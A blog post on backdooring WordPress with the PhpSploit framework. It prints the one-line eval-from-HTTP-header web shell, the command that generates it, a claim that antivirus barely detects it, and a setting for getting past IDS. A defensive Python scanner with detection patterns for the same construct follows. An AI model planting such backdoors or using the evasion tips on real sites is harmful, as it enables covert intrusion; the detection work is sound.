Backdooring WordPress with Phpsploit

11/23/2020



PhpSploit is a remote control framework that aims to provide a stealthy, interactive, shell-like connection over HTTP between client and web server. It is a post-exploitation tool capable of maintaining access to a compromised web server for privilege escalation purposes.

Installation & Run:

Download: https://github.com/nil0x42/phpsploit

When you run Phpsploit and generate a standard backdoor to place in WordPress or other PHP code, it looks like this:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>

The above code can be generated by running the following command:

./phpsploit --interactive --eval "backdoor"

If we insert this little eval snippet into a WordPress PHP file and then upload the file to VirusTotal, the detection rate across the 58 antivirus scanners currently online at VirusTotal looks like this:

Just one hit, and it is ClamAV detecting the backdoor as Php.Trojan.PhpSploit-7157376-0.

If we then run phpsploit again and set another PASSKEY as an example

And it should be quite easy to trigger IDS alerts at the network level, since PHP code like eval and base64_decode should not be part of an HTTP header. This can of course also be changed in Phpsploit by using the command set REQ_HEADER_PAYLOAD.
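
As an added example (not from the original post or the Phpsploit project), here is a defender-side check in Python for the two detection points discussed above: the eval-from-header construct in PHP files, and PHP call syntax inside HTTP header values. The file check matches any header name, on the assumption that changing PASSKEY only changes the name inside $_SERVER['HTTP_...']; the function names, sample file and sample headers are constructed for illustration.

```python
import re

# Matches eval() fed directly from a request header, e.g.
#   <?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
# The header name is left open so a non-default PASSKEY still matches (assumption).
BACKDOOR_RE = re.compile(
    r"""@?\s*eval\s*\(\s*\$_SERVER\s*\[\s*['"]HTTP_\w+['"]\s*\]\s*\)""",
    re.IGNORECASE,
)

# PHP function names that have no business inside an HTTP header value.
HEADER_TOKENS_RE = re.compile(r"\b(eval|base64_decode)\s*\(", re.IGNORECASE)


def scan_php_source(text):
    """Return (line_number, line) for every line holding the eval-from-header construct."""
    return [
        (n, line.strip())
        for n, line in enumerate(text.splitlines(), 1)
        if BACKDOOR_RE.search(line)
    ]


def suspicious_headers(headers):
    """Return the names of request headers whose value contains PHP call syntax."""
    return [name for name, value in headers.items() if HEADER_TOKENS_RE.search(value)]


# Constructed sample: a WordPress-style file with the snippet from the article inserted.
SAMPLE_PHP = """<?php
define('WP_USE_THEMES', true);
<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
require __DIR__ . '/wp-blog-header.php';
"""

# Constructed sample request headers; the payload value is a harmless placeholder.
SAMPLE_HEADERS = {
    "Host": "blog.example",
    "User-Agent": "Mozilla/5.0",
    "Phpspl01t": "eval(base64_decode('cGxhY2Vob2xkZXI='));",
}

if __name__ == "__main__":
    for n, line in scan_php_source(SAMPLE_PHP):
        print(f"line {n}: {line}")
    print("suspicious headers:", suspicious_headers(SAMPLE_HEADERS))
```

A match in a WordPress core, theme or plugin file is a reason to diff that file against a clean copy of the same version; the header check only catches the default payload location, since the post notes REQ_HEADER_PAYLOAD can change it.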


from : wpsec
